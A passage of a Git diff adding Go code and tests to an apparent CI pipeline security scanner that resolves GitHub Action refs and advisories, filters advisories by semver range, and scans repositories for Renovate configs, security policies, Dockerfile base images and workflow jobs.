+
+type repoCacheEntry struct {
+ archived bool
+ fetched bool
+ err error
+}
+
+// NewGitHubMetadataClient builds a client using the gh-CLI auth
+// store. Returns a usable client even when authentication is
+// missing β see Available() to check. Honors the
+// PLUMBER_DISABLE_GITHUB_API env var which short-circuits the
+// client into degraded mode regardless of auth state.
+func NewGitHubMetadataClient() *GitHubMetadataClient {
+ c := &GitHubMetadataClient{
+ repoCache: map[string]repoCacheEntry{},
+ refCache: map[string]GitHubMetadata{},
+ latestCache: map[string]string{},
+ advisoryCache: map[string][]advisoryInfo{},
+ sha2tagCache: map[string]map[string]string{},
+ }
+ if v := os.Getenv(EnvDisableGitHubAPI); v == "1" || v == "true" {
+ c.disabled = true
+ return c
+ }
+ rest, err := api.DefaultRESTClient()
+ if err != nil {
+ c.disabled = true
+ c.disableCause = err
+ return c
+ }
+ c.rest = rest
+ return c
+}
+
+// Available reports whether the client has a usable gh auth token.
+func (c *GitHubMetadataClient) Available() bool {
+ return !c.disabled
+}
+
+// Resolve looks up "owner/repo@ref" and returns what the API told
+// us. Never returns an error β all failures degrade to "unknown"
+// (zero-valued GitHubMetadata). Repeated calls for the same key
+// return the cached value.
+func (c *GitHubMetadataClient) Resolve(ownerRepoRef string) GitHubMetadata {
+ if c.disabled {
+ return GitHubMetadata{}
+ }
+ owner, repo, ref, ok := splitActionRef(ownerRepoRef)
+ if !ok {
+ return GitHubMetadata{}
+ }
+ key := owner + "/" + repo + "@" + ref
+
+ c.mu.Lock()
+ if v, cached := c.refCache[key]; cached {
+ c.mu.Unlock()
+ return v
+ }
+ c.mu.Unlock()
+
+ meta := c.resolveUncached(owner, repo, ref)
+
+ c.mu.Lock()
+ c.refCache[key] = meta
+ c.mu.Unlock()
+ return meta
+}
+
+func (c *GitHubMetadataClient) resolveUncached(owner, repo, ref string) GitHubMetadata {
+ m := GitHubMetadata{}
+ m.RepoArchived = c.isRepoArchived(owner, repo)
+ m.LatestTag = c.latestReleaseTag(owner, repo)
+ if m.LatestTag != "" {
+ if sha, ok := c.resolveTag(owner, repo, m.LatestTag); ok {
+ m.LatestReleaseSha = sha
+ }
+ }
+ m.Advisories = c.advisoriesForRef(owner, repo, ref)
+
+ // Probe in order: tag β branch β commit. First hit wins, but
+ // when we match a tag we still check whether a same-named branch
+ // exists upstream β that cross-existence is what ref-confusion
+ // (ISSUE-113) is about.
+ if sha, ok := c.resolveTag(owner, repo, ref); ok {
+ m.RefKind = "tag"
+ m.TagSha = sha
+ m.RefExists = true
+ if c.branchExists(owner, repo, ref) {
+ m.RefIsAmbiguous = true
+ }
+ return m
+ }
+ if c.branchExists(owner, repo, ref) {
+ m.RefKind = "branch"
+ m.RefExists = true
+ return m
+ }
+ if c.commitExists(owner, repo, ref) {
+ m.RefKind = "commit"
+ m.RefExists = true
+ return m
+ }
+ // Unknown ref β keep RefKind empty, RefExists false.
+ return m
+}
+
+// advisoriesForRef returns only the advisories whose vulnerable
+// version range actually covers the pinned ref. The raw advisory
+// list is fetched once per `owner/repo` and cached; the per-ref
+// filtering uses a semver comparison against every vulnerability
+// entry the advisory declares for this package.
+//
+// When the ref cannot be resolved to a comparable version (unknown
+// tag, commit SHA that does not point at a release), the filter
+// degrades to "keep advisories that reference this package at
+// all" β better a false positive than a silent miss on a real CVE.
+func (c *GitHubMetadataClient) advisoriesForRef(owner, repo, ref string) []string {
+ infos := c.advisoriesForRepo(owner, repo)
+ if len(infos) == 0 {
+ return nil
+ }
+ refVersion := c.resolveRefToVersion(owner, repo, ref)
+ out := []string{}
+ seen := map[string]struct{}{}
+ for _, a := range infos {
+ if a.GhsaID == "" {
+ continue
+ }
+ if _, dup := seen[a.GhsaID]; dup {
+ continue
+ }
+ if refVersion == nil || _versionInRange(refVersion, a.VulnerableRange) {
+ out = append(out, a.GhsaID)
+ seen[a.GhsaID] = struct{}{}
+ }
+ }
+ return out
+}
+
+// advisoriesForRepo fetches every GitHub Advisory Database entry
+// for an `owner/repo` action package, flattens each vulnerability
+// entry to an advisoryInfo, and caches the result so repeated
+// callers of the same action cost one API call.
+func (c *GitHubMetadataClient) advisoriesForRepo(owner, repo string) []advisoryInfo {
+ key := owner + "/" + repo
+ c.mu.Lock()
+ if v, ok := c.advisoryCache[key]; ok {
+ c.mu.Unlock()
+ return v
+ }
+ c.mu.Unlock()
+
+ var resp []struct {
+ GhsaID string `json:"ghsa_id"`
+ Vulnerabilities []struct {
+ Package struct {
+ Name string `json:"name"`
+ } `json:"package"`
+ VulnerableVersionRange string `json:"vulnerable_version_range"`
+ PatchedVersions string `json:"patched_versions"`
+ } `json:"vulnerabilities"`
+ }
+ out := []advisoryInfo{}
+ if err := c.rest.Get(fmt.Sprintf("advisories?ecosystem=actions&affects=%s/%s&per_page=100", owner, repo), &resp); err == nil {
+ want := key
+ for _, a := range resp {
+ for _, v := range a.Vulnerabilities {
+ if !strings.EqualFold(v.Package.Name, want) {
+ continue
+ }
+ out = append(out, advisoryInfo{
+ GhsaID: a.GhsaID,
+ VulnerableRange: v.VulnerableVersionRange,
+ PatchedVersions: v.PatchedVersions,
+ })
+ }
+ }
+ }
+ c.mu.Lock()
+ c.advisoryCache[key] = out
+ c.mu.Unlock()
+ return out
+}
+
+// resolveRefToVersion turns the ref string into a comparable semver
+// value: if the ref is already a tag, strip the leading "v"; if
+// it is a 40-char commit SHA, look it up in the repo's tag list and
+// use the matching tag. Returns nil when the version cannot be
+// determined β callers then fall back to "flag everything" so a
+// genuine CVE does not slip past because Plumber could not match
+// the SHA to a release.
+func (c *GitHubMetadataClient) resolveRefToVersion(owner, repo, ref string) *version.Version {
+ // Tag-shaped ref: parse directly.
+ if v, err := version.NewVersion(strings.TrimPrefix(ref, "v")); err == nil {
+ return v
+ }
+ // SHA-shaped ref: look up the tag.
+ if _isCommitSha(ref) {
+ if tag := c.resolveCommitToTag(owner, repo, ref); tag != "" {
+ if v, err := version.NewVersion(strings.TrimPrefix(tag, "v")); err == nil {
+ return v
+ }
+ }
+ }
+ return nil
+}
+
+var _shaOnly = regexp.MustCompile(`^[0-9a-f]{40}$`)
+
+func _isCommitSha(ref string) bool {
+ return _shaOnly.MatchString(ref)
+}
+
+// resolveCommitToTag returns the release tag pointing at the given
+// commit SHA, or "" when the SHA is not the head of any published
+// tag. The repo's full tag list is fetched once and cached.
+func (c *GitHubMetadataClient) resolveCommitToTag(owner, repo, sha string) string {
+ key := owner + "/" + repo
+ c.mu.Lock()
+ tags, cached := c.sha2tagCache[key]
+ c.mu.Unlock()
+ if !cached {
+ tags = c.fetchAllTags(owner, repo)
+ c.mu.Lock()
+ c.sha2tagCache[key] = tags
+ c.mu.Unlock()
+ }
+ return tags[sha]
+}
+
+// fetchAllTags walks the paginated `/repos/{owner}/{repo}/tags`
+// endpoint and returns a SHA β tag-name map. The map contains
+// every tag even when several tags share a SHA β the last tag wins,
+// which is acceptable for the version-comparison use case.
+func (c *GitHubMetadataClient) fetchAllTags(owner, repo string) map[string]string {
+ out := map[string]string{}
+ for page := 1; page <= 20; page++ { // hard cap 2000 tags
+ var resp []struct {
+ Name string `json:"name"`
+ Commit struct {
+ Sha string `json:"sha"`
+ } `json:"commit"`
+ }
+ path := fmt.Sprintf("repos/%s/%s/tags?per_page=100&page=%d", owner, repo, page)
+ if err := c.rest.Get(path, &resp); err != nil || len(resp) == 0 {
+ break
+ }
+ for _, t := range resp {
+ if t.Name != "" && t.Commit.Sha != "" {
+ out[t.Commit.Sha] = t.Name
+ }
+ }
+ if len(resp) < 100 {
+ break
+ }
+ }
+ return out
+}
+
+// _versionInRange parses the GitHub-advisory version range syntax
+// (`>= 3.26.11, <= 3.28.2`, `< 3.0.0`, `1.2.3`) with
+// hashicorp/go-version and reports whether v falls inside. A range
+// string Plumber cannot parse is treated as "affects everything"
+// so a parser failure never hides a real CVE.
+func _versionInRange(v *version.Version, rangeExpr string) bool {
+ rangeExpr = strings.TrimSpace(rangeExpr)
+ if rangeExpr == "" {
+ return true
+ }
+ // Advisory ranges come comma-separated, which is hashicorp/go-
+ // version's native multi-constraint syntax.
+ constraints, err := version.NewConstraint(rangeExpr)
+ if err != nil {
+ return true
+ }
+ return constraints.Check(v)
+}
+
+func (c *GitHubMetadataClient) isRepoArchived(owner, repo string) bool {
+ c.mu.Lock()
+ cached, ok := c.repoCache[owner+"/"+repo]
+ c.mu.Unlock()
+ if ok && cached.fetched {
+ return cached.archived
+ }
+ var resp struct {
+ Archived bool `json:"archived"`
+ }
+ entry := repoCacheEntry{fetched: true}
+ if err := c.rest.Get(fmt.Sprintf("repos/%s/%s", owner, repo), &resp); err != nil {
+ entry.err = err
+ } else {
+ entry.archived = resp.Archived
+ }
+ c.mu.Lock()
+ c.repoCache[owner+"/"+repo] = entry
+ c.mu.Unlock()
+ return entry.archived
+}
+
+// latestReleaseTag returns the highest semver tag across a repo's
+// releases. `/releases/latest` alone is not reliable: many action
+// repos (github/codeql-action, actions/download-artifact) publish
+// out-of-band tags β internal bundle snapshots like
+// `codeql-bundle-v2.25.2` or compatibility bridges like
+// `v3.1.0-node20` β that rank as "latest" by date even though they
+// are not the user-facing release. The date-sorted order is also
+// misleading when maintainers backport a fix to an older line and
+// republish it *after* a newer major (e.g. v3.1.0 republished after
+// v8.0.1). ISSUE-111 is a semver-drift signal, so Plumber walks the
+// first few pages and picks the highest semver among non-draft,
+// non-prerelease tags whose semver itself has no prerelease segment.
+func (c *GitHubMetadataClient) latestReleaseTag(owner, repo string) string {
+ key := owner + "/" + repo
+ c.mu.Lock()
+ if v, ok := c.latestCache[key]; ok {
+ c.mu.Unlock()
+ return v
+ }
+ c.mu.Unlock()
+
+ var best *version.Version
+ bestTag := ""
+ for page := 1; page <= 3; page++ {
+ var resp []struct {
+ TagName string `json:"tag_name"`
+ Draft bool `json:"draft"`
+ Prerelease bool `json:"prerelease"`
+ }
+ path := fmt.Sprintf("repos/%s/%s/releases?per_page=50&page=%d", owner, repo, page)
+ if err := c.rest.Get(path, &resp); err != nil || len(resp) == 0 {
+ break
+ }
+ for _, r := range resp {
+ if r.Draft || r.Prerelease {
+ continue
+ }
+ parsed, err := version.NewVersion(strings.TrimPrefix(r.TagName, "v"))
+ if err != nil {
+ continue
+ }
+ // Reject compatibility bridges / betas whose semver
+ // carries a prerelease segment (e.g. `v3.1.0-node20`,
+ // `v1.0.0-beta`). GitHub sometimes publishes these with
+ // `prerelease: false`, so the API flag alone is not
+ // sufficient.
+ if parsed.Prerelease() != "" {
+ continue
+ }
+ if best == nil || parsed.GreaterThan(best) {
+ best = parsed
+ bestTag = r.TagName
+ }
+ }
+ if len(resp) < 50 {
+ break
+ }
+ }
+ c.mu.Lock()
+ c.latestCache[key] = bestTag
+ c.mu.Unlock()
+ return bestTag
+}
+
+// ResolveTagSha exposes the tag β SHA lookup publicly so the
+// ref-version-mismatch enrichment can query the commented tag
+// without going through the full Resolve() probe chain.
+func (c *GitHubMetadataClient) ResolveTagSha(ownerRepo, tag string) string {
+ if c.disabled || tag == "" {
+ return ""
+ }
+ parts := strings.SplitN(ownerRepo, "/", 2)
+ if len(parts) < 2 {
+ return ""
+ }
+ sha, ok := c.resolveTag(parts[0], parts[1], tag)
+ if !ok {
+ return ""
+ }
+ return sha
+}
+
+// resolveTag returns (sha, true) when ref is a tag on the repo and
+// we can read the SHA it points at. Returns ("", false) otherwise.
+func (c *GitHubMetadataClient) resolveTag(owner, repo, ref string) (string, bool) {
+ var resp json.RawMessage
+ err := c.rest.Get(fmt.Sprintf("repos/%s/%s/git/ref/tags/%s", owner, repo, ref), &resp)
+ if err != nil {
+ return "", false
+ }
+ // The reply is either a tag ref (object.type="commit") or a tag
+ // object (object.type="tag") β in the latter case, the SHA
+ // points at the tag object, not the commit. Resolving the tag
+ // object to its target commit requires a second call.
+ var parsed struct {
+ Object struct {
+ Sha string `json:"sha"`
+ Type string `json:"type"`
+ URL string `json:"url"`
+ } `json:"object"`
+ }
+ if err := json.Unmarshal(resp, &parsed); err != nil {
+ return "", false
+ }
+ if parsed.Object.Type == "tag" {
+ var tagObj struct {
+ Object struct {
+ Sha string `json:"sha"`
+ } `json:"object"`
+ }
+ // git/tags/ resolves the annotated-tag object to the
+ // commit. If this secondary call fails we still return the
+ // tag-object SHA: the policy only needs "is this a tag" plus
+ // a stable identifier.
+ if err := c.rest.Get(fmt.Sprintf("repos/%s/%s/git/tags/%s", owner, repo, parsed.Object.Sha), &tagObj); err == nil {
+ return tagObj.Object.Sha, true
+ }
+ }
+ return parsed.Object.Sha, true
+}
+
+func (c *GitHubMetadataClient) branchExists(owner, repo, ref string) bool {
+ var resp json.RawMessage
+ err := c.rest.Get(fmt.Sprintf("repos/%s/%s/branches/%s", owner, repo, ref), &resp)
+ return err == nil
+}
+
+func (c *GitHubMetadataClient) commitExists(owner, repo, ref string) bool {
+ // GitHub's commits endpoint accepts short SHAs too, but for
+ // impostor-commit we specifically want to know if a full 40-
+ // char SHA resolves. Narrower form than resolveTag β we only
+ // need success vs failure.
+ var resp json.RawMessage
+ err := c.rest.Get(fmt.Sprintf("repos/%s/%s/commits/%s", owner, repo, ref), &resp)
+ return err == nil
+}
+
+// isZeroMetadata reports whether meta has no content. GitHubMetadata
+// now carries a slice field, which Go refuses to compare with `==`,
+// so we spell the zero-check out field by field.
+func isZeroMetadata(meta GitHubMetadata) bool {
+ if meta.RepoArchived || meta.RefExists || meta.RefIsAmbiguous {
+ return false
+ }
+ if meta.RefKind != "" || meta.TagSha != "" || meta.LatestTag != "" || meta.LatestReleaseSha != "" {
+ return false
+ }
+ if len(meta.Advisories) > 0 {
+ return false
+ }
+ return true
+}
+
+// splitActionRef parses "owner/repo@ref" into its three parts. For
+// path-scoped composite actions ("owner/repo/path/to/action@ref")
+// the repo portion is "repo" (first path segment) β we never need
+// the sub-path for metadata lookups. Returns ok=false for forms
+// plumber cannot check against the GitHub API (local actions,
+// docker:// refs, bare strings).
+func splitActionRef(uses string) (owner, repo, ref string, ok bool) {
+ if strings.HasPrefix(uses, "./") || strings.HasPrefix(uses, "docker://") {
+ return "", "", "", false
+ }
+ at := strings.Index(uses, "@")
+ if at < 0 {
+ return "", "", "", false
+ }
+ head, tail := uses[:at], uses[at+1:]
+ parts := strings.SplitN(head, "/", 3)
+ if len(parts) < 2 {
+ return "", "", "", false
+ }
+ return parts[0], parts[1], tail, true
+}
diff --git a/collector/github_metadata_test.go b/collector/github_metadata_test.go
new file mode 100644
index 0000000..24df264
--- /dev/null
+++ b/collector/github_metadata_test.go
@@ -0,0 +1,41 @@
+package collector
+
+import (
+ "testing"
+
+ version "github.com/hashicorp/go-version"
+)
+
+// Test_versionInRange locks the ISSUE-114 range-filter semantics.
+// The scenario comes from a real-world false positive: the codeql-
+// action pinned at v4.35.1 was flagged for GHSA-vqf5-2xx6-9wfm
+// whose range covers `>= 3.26.11, <= 3.28.2` and `>= 2.26.11, <
+// 3.0.0`. A strict semver check keeps v4.35.1 out of either range
+// and silences the false positive.
+func Test_versionInRange(t *testing.T) {
+ cases := []struct {
+ ver, rng string
+ want bool
+ }{
+ {"3.28.2", ">= 3.26.11, <= 3.28.2", true}, // upper bound inclusive
+ {"3.28.3", ">= 3.26.11, <= 3.28.2", false}, // past upper bound
+ {"3.26.10", ">= 3.26.11, <= 3.28.2", false},
+ {"4.35.1", ">= 3.26.11, <= 3.28.2", false}, // real-world regression
+ {"2.30.0", ">= 2.26.11, < 3.0.0", true},
+ {"3.0.0", ">= 2.26.11, < 3.0.0", false},
+ // Empty / unparseable ranges degrade to "affects everything"
+ // so a broken advisory never silences a real CVE.
+ {"1.0.0", "", true},
+ {"1.0.0", "nonsense-range", true},
+ }
+ for _, c := range cases {
+ v, err := version.NewVersion(c.ver)
+ if err != nil {
+ t.Fatalf("version parse %q: %v", c.ver, err)
+ }
+ got := _versionInRange(v, c.rng)
+ if got != c.want {
+ t.Errorf("_versionInRange(%q, %q) = %v, want %v", c.ver, c.rng, got, c.want)
+ }
+ }
+}
diff --git a/collector/github_repo_artifacts.go b/collector/github_repo_artifacts.go
new file mode 100644
index 0000000..5a66882
--- /dev/null
+++ b/collector/github_repo_artifacts.go
@@ -0,0 +1,188 @@
+package collector
+
+import (
+ "bufio"
+ "fmt"
+ "os"
+ "path/filepath"
+ "regexp"
+ "sort"
+ "strings"
+
+ "github.com/getplumber/plumber/internal/ir"
+ "github.com/getplumber/plumber/utils"
+)
+
+// scanRenovateConfig looks for the usual Renovate config names at
+// the repo root, under .github/, or under .gitlab/. Returns the
+// first path found or the empty string. A match here is enough to
+// consider "a dependency-update tool is configured" β Plumber does
+// not try to evaluate the Renovate config's correctness.
+func scanRenovateConfig(rootDir string) string {
+ candidates := []string{
+ "renovate.json",
+ "renovate.json5",
+ ".renovaterc",
+ ".renovaterc.json",
+ ".github/renovate.json",
+ ".github/renovate.json5",
+ ".gitlab/renovate.json",
+ }
+ for _, c := range candidates {
+ p := filepath.Join(rootDir, c)
+ if fi, err := os.Stat(p); err == nil && !fi.IsDir() {
+ return p
+ }
+ }
+ return ""
+}
+
+// scanSecurityPolicy returns the path of the first SECURITY.md-like
+// file found at the repository root, under .github/, or under
+// docs/. GitHub itself recognises those three locations for the
+// disclosure-policy field on the repo UI.
+func scanSecurityPolicy(rootDir string) string {
+ // Case-insensitive list covering the most common spellings.
+ names := []string{
+ "SECURITY.md", "security.md", "Security.md",
+ "SECURITY.markdown", "security.markdown",
+ "SECURITY", "security",
+ }
+ dirs := []string{"", ".github", "docs", ".gitlab"}
+ for _, d := range dirs {
+ for _, n := range names {
+ p := filepath.Join(rootDir, d, n)
+ if fi, err := os.Stat(p); err == nil && !fi.IsDir() {
+ return p
+ }
+ }
+ }
+ return ""
+}
+
+// scanDockerfiles discovers Dockerfile-shaped files at the
+// repository root and under common build / service directories
+// (up to two levels deep), then parses each for FROM directives.
+// The scan is deliberately bounded to avoid walking every
+// vendored dependency: projects that keep Dockerfiles elsewhere
+// can still surface them via an explicit symlink at the root.
+func scanDockerfiles(rootDir string) []ir.Dockerfile {
+ var out []ir.Dockerfile
+ // Stage 1: root + common build dirs one level down.
+ candidates := map[string]struct{}{}
+ collectDockerfileCandidates(rootDir, 2, candidates)
+ paths := make([]string, 0, len(candidates))
+ for path := range candidates {
+ paths = append(paths, path)
+ }
+ sort.Strings(paths)
+ for _, path := range paths {
+ df, err := parseDockerfileBases(path)
+ if err != nil {
+ continue
+ }
+ df.Path = path
+ out = append(out, df)
+ }
+ return out
+}
+
+var dockerfileNamePattern = regexp.MustCompile(`(?i)^(Dockerfile|Containerfile)([.\-][A-Za-z0-9._-]+)?$`)
+
+func collectDockerfileCandidates(dir string, depth int, out map[string]struct{}) {
+ if depth < 0 {
+ return
+ }
+ entries, err := os.ReadDir(dir)
+ if err != nil {
+ return
+ }
+ for _, e := range entries {
+ name := e.Name()
+ if e.IsDir() {
+ // Never descend into the big drains on a typical repo.
+ switch name {
+ case ".git", "node_modules", "vendor", "testdata", ".terraform":
+ continue
+ }
+ // Hidden dirs beyond .github are skipped to avoid dotfiles
+ // that ship fixture Dockerfiles (e.g. .devcontainer is OK).
+ if strings.HasPrefix(name, ".") && name != ".github" && name != ".devcontainer" {
+ continue
+ }
+ collectDockerfileCandidates(filepath.Join(dir, name), depth-1, out)
+ continue
+ }
+ if dockerfileNamePattern.MatchString(name) {
+ out[filepath.Join(dir, name)] = struct{}{}
+ }
+ }
+}
+
+// parseDockerfileBases extracts every `FROM [:tag][@digest]`
+// line from a Dockerfile, preserving the line number and digest-
+// pinning state. Multi-stage builds surface every stage (the
+// reviewer cares about each base, not just the final one).
+//
+// `ARG FOO=default` statements are collected and their default
+// values substituted into any `FROM` ref that references them β
+// idiomatic Dockerfiles pin the digest at the top (`ARG
+// GOLANG_IMAGE_TAG=1.26-bookworm@sha256:β¦`) and reuse the variable
+// across stages. Without substitution the parser would treat those
+// stages as unpinned and flag false ISSUE-107 findings.
+func parseDockerfileBases(path string) (ir.Dockerfile, error) {
+ f, err := os.Open(path) // #nosec G304
+ if err != nil {
+ return ir.Dockerfile{}, fmt.Errorf("open %s: %w", path, err)
+ }
+ defer func() { _ = f.Close() }()
+
+ var bases []ir.DockerfileBase
+ argVals := map[string]string{}
+ fromRe := regexp.MustCompile(`(?i)^\s*FROM\s+(--platform=\S+\s+)?(\S+)(\s+AS\s+\S+)?\s*$`)
+ argRe := regexp.MustCompile(`(?i)^\s*ARG\s+([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.+?)\s*$`)
+ varRe := regexp.MustCompile(`\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?`)
+ sc := bufio.NewScanner(f)
+ sc.Buffer(make([]byte, 0, 64*1024), 1024*1024)
+ lineNum := 0
+ for sc.Scan() {
+ lineNum++
+ line := strings.TrimRight(sc.Text(), " \t\r")
+ if m := argRe.FindStringSubmatch(line); m != nil {
+ // Strip surrounding quotes if any β `ARG X="value"`.
+ val := strings.Trim(m[2], `"'`)
+ argVals[m[1]] = val
+ continue
+ }
+ m := fromRe.FindStringSubmatch(line)
+ if m == nil {
+ continue
+ }
+ ref := m[2]
+ // Resolve `${VAR}` / `$VAR` references using the ARG defaults
+ // collected so far. Unknown variables stay as-is so the
+ // downstream check still flags a genuinely unpinned base.
+ resolved := varRe.ReplaceAllStringFunc(ref, func(match string) string {
+ name := strings.Trim(match, "${}")
+ if v, ok := argVals[name]; ok {
+ return v
+ }
+ return match
+ })
+ // Skip build-stage aliases β after substitution the ref is
+ // typically a bare word (e.g. `builder`) with no slash or
+ // colon; those are caught by the policy's stage-ref heuristic.
+ if strings.HasPrefix(strings.ToLower(resolved), "$") {
+ continue
+ }
+ bases = append(bases, ir.DockerfileBase{
+ Image: resolved,
+ Line: lineNum,
+ PinnedByDigest: utils.HasDigestPin(resolved),
+ })
+ }
+ if err := sc.Err(); err != nil {
+ return ir.Dockerfile{}, fmt.Errorf("scan %s: %w", path, err)
+ }
+ return ir.Dockerfile{Path: path, Bases: bases}, nil
+}
diff --git a/collector/github_repo_artifacts_test.go b/collector/github_repo_artifacts_test.go
new file mode 100644
index 0000000..e37791f
--- /dev/null
+++ b/collector/github_repo_artifacts_test.go
@@ -0,0 +1,39 @@
+package collector
+
+import (
+ "os"
+ "path/filepath"
+ "testing"
+)
+
+func TestScanDockerfilesSortedByPath(t *testing.T) {
+ root := t.TempDir()
+ if err := os.Mkdir(filepath.Join(root, "z"), 0o755); err != nil {
+ t.Fatal(err)
+ }
+ if err := os.Mkdir(filepath.Join(root, "a"), 0o755); err != nil {
+ t.Fatal(err)
+ }
+ pathZ := filepath.Join(root, "z", "Dockerfile")
+ pathA := filepath.Join(root, "a", "Dockerfile")
+ mustWriteFile(t, pathZ, "FROM alpine:3\n")
+ mustWriteFile(t, pathA, "FROM alpine:3\n")
+
+ dfs := scanDockerfiles(root)
+ if len(dfs) != 2 {
+ t.Fatalf("expected 2 dockerfiles, got %d", len(dfs))
+ }
+ if dfs[0].Path >= dfs[1].Path {
+ t.Fatalf("expected lexicographic path order, got %q before %q", dfs[0].Path, dfs[1].Path)
+ }
+ if dfs[0].Path != pathA || dfs[1].Path != pathZ {
+ t.Fatalf("expected a before z, got %q then %q", dfs[0].Path, dfs[1].Path)
+ }
+}
+
+func mustWriteFile(t *testing.T, path, content string) {
+ t.Helper()
+ if err := os.WriteFile(path, []byte(content), 0o644); err != nil {
+ t.Fatal(err)
+ }
+}
diff --git a/collector/github_workflows.go b/collector/github_workflows.go
new file mode 100644
index 0000000..a48091e
--- /dev/null
+++ b/collector/github_workflows.go
@@ -0,0 +1,825 @@
+package collector
+
+import (
+ "fmt"
+ "os"
+ "path/filepath"
+ "regexp"
+ "sort"
+ "strings"
+
+ "gopkg.in/yaml.v2"
+
+ "github.com/getplumber/plumber/internal/ir"
+)
+
+const githubWorkflowsSubdir = ".github/workflows"
+
+// ScanGitHubWorkflows reads every .yml/.yaml file under
+// /.github/workflows/ and aggregates them into a single
+// NormalizedPipeline. Job names are namespaced by the workflow file base
+// name ("ci/lint", "release/build", ...) so two workflows can expose
+// identically-named jobs without clashing in the IR.
+//
+// A missing workflows directory is not an error: the returned pipeline
+// simply carries no jobs. Individual unreadable or unparseable files are
+// returned in partialErrors so the caller can surface them without
+// aborting the whole scan.
+func ScanGitHubWorkflows(projectPath, defaultBranch, rootDir string) (pipeline *ir.NormalizedPipeline, partialErrors []error, err error) {
+ pipeline = &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ ProjectPath: projectPath,
+ DefaultBranch: defaultBranch,
+ }
+
+ dir := filepath.Join(rootDir, githubWorkflowsSubdir)
+ entries, err := os.ReadDir(dir)
+ if err != nil {
+ if os.IsNotExist(err) {
+ return pipeline, nil, nil
+ }
+ return nil, nil, fmt.Errorf("read %s: %w", dir, err)
+ }
+
+ for _, entry := range entries {
+ if entry.IsDir() {
+ continue
+ }
+ name := entry.Name()
+ if !strings.HasSuffix(name, ".yml") && !strings.HasSuffix(name, ".yaml") {
+ continue
+ }
+ path := filepath.Join(dir, name)
+ data, readErr := os.ReadFile(path)
+ if readErr != nil {
+ partialErrors = append(partialErrors, fmt.Errorf("%s: %w", name, readErr))
+ continue
+ }
+ jobs, parseErr := parseGitHubWorkflowJobs(data, workflowBaseName(name), path)
+ if parseErr != nil {
+ partialErrors = append(partialErrors, fmt.Errorf("%s: %w", name, parseErr))
+ continue
+ }
+ pipeline.Jobs = append(pipeline.Jobs, jobs...)
+ }
+
+ sort.Slice(pipeline.Jobs, func(i, j int) bool {
+ return pipeline.Jobs[i].Name < pipeline.Jobs[j].Name
+ })
+ if dcfg, derr := scanDependabotConfig(rootDir); derr != nil {
+ partialErrors = append(partialErrors, derr)
+ } else if dcfg != nil {
+ pipeline.Dependabot = dcfg
+ }
+ pipeline.RenovateConfigPath = scanRenovateConfig(rootDir)
+ pipeline.SecurityPolicyPath = scanSecurityPolicy(rootDir)
+ pipeline.Dockerfiles = scanDockerfiles(rootDir)
+ // Enrich actions with GitHub API metadata (archived repo, ref
+ // kind, tag SHA). Best-effort: if gh is not authenticated, the
+ // client operates in degraded mode and leaves metadata empty.
+ enrichActionsWithAPIMetadata(pipeline, nil)
+ return pipeline, partialErrors, nil
+}
+
+// ScanGitHubWorkflowsWithProgress mirrors ScanGitHubWorkflows but
+// notifies the caller through progressFn as it works. The progress
+// total is sized so the bar advances monotonically end-to-end:
+//
+// step 1 Scanning workflow files
+// step 2..(1+N) Resolving action (N unique refs)
+// step 2+N Scan complete
+//
+// The last step (policy evaluation) is reported by the caller
+// (RunGitHubAnalysis) using the same total so the bar keeps
+// climbing. progressFn may be nil; callers that don't care about
+// progress should call the plain ScanGitHubWorkflows variant.
+func ScanGitHubWorkflowsWithProgress(projectPath, defaultBranch, rootDir string, progressFn ProgressFunc) (pipeline *ir.NormalizedPipeline, partialErrors []error, err error) {
+ pipeline = &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitHub,
+ ProjectPath: projectPath,
+ DefaultBranch: defaultBranch,
+ }
+ dir := filepath.Join(rootDir, githubWorkflowsSubdir)
+ entries, err := os.ReadDir(dir)
+ if err != nil {
+ if os.IsNotExist(err) {
+ return pipeline, nil, nil
+ }
+ return nil, nil, fmt.Errorf("read %s: %w", dir, err)
+ }
+ for _, entry := range entries {
+ if entry.IsDir() {
+ continue
+ }
+ name := entry.Name()
+ if !strings.HasSuffix(name, ".yml") && !strings.HasSuffix(name, ".yaml") {
+ continue
+ }
+ path := filepath.Join(dir, name)
+ data, readErr := os.ReadFile(path)
+ if readErr != nil {
+ partialErrors = append(partialErrors, fmt.Errorf("%s: %w", name, readErr))
+ continue
+ }
+ jobs, parseErr := parseGitHubWorkflowJobs(data, workflowBaseName(name), path)
+ if parseErr != nil {
+ partialErrors = append(partialErrors, fmt.Errorf("%s: %w", name, parseErr))
+ continue
+ }
+ pipeline.Jobs = append(pipeline.Jobs, jobs...)
+ }
+ sort.Slice(pipeline.Jobs, func(i, j int) bool {
+ return pipeline.Jobs[i].Name < pipeline.Jobs[j].Name
+ })
+ if dcfg, derr := scanDependabotConfig(rootDir); derr != nil {
+ partialErrors = append(partialErrors, derr)
+ } else if dcfg != nil {
+ pipeline.Dependabot = dcfg
+ }
+ pipeline.RenovateConfigPath = scanRenovateConfig(rootDir)
+ pipeline.SecurityPolicyPath = scanSecurityPolicy(rootDir)
+ pipeline.Dockerfiles = scanDockerfiles(rootDir)
+ // Reserve 3 leading/trailing steps around the per-action phase:
+ // "Scanning" at step 1, "Evaluating policies" at step (total-1)
+ // emitted by the caller (RunGitHubAnalysis), and a final "Scan
+ // complete" at total.
+ n := countUniqueActionRefs(pipeline)
+ total := n + 3
+ report(progressFn, 1, total, "Scanning workflow files")
+ enrichActionsWithAPIMetadata(pipeline, wrapProgress(progressFn, total))
+ return pipeline, partialErrors, nil
+}
+
+// countUniqueActionRefs returns the number of distinct `owner/
+// repo@ref` step-level references the pipeline carries. Used to
+// size the progress bar; duplicates only count once because the
+// metadata client caches every lookup.
+func countUniqueActionRefs(pipeline *ir.NormalizedPipeline) int {
+ seen := map[string]struct{}{}
+ for i := range pipeline.Jobs {
+ for k := range pipeline.Jobs[i].Uses {
+ seen[pipeline.Jobs[i].Uses[k].Uses] = struct{}{}
+ }
+ }
+ return len(seen)
+}
+
+// wrapProgress adapts the per-enrichment-step callback (done, N,
+// message) into the global progress scale so the bar keeps
+// climbing. The enrichment owns slots 2..(1+N); its inner `done`
+// counter is offset by +1 and its total is overridden to the
+// pipeline-wide grand total.
+func wrapProgress(fn ProgressFunc, grandTotal int) ProgressFunc {
+ if fn == nil {
+ return nil
+ }
+ return func(done, _ int, message string) {
+ fn(done+1, grandTotal, message)
+ }
+}
+
+// TotalProgressStepsForPipeline returns the grand total the caller
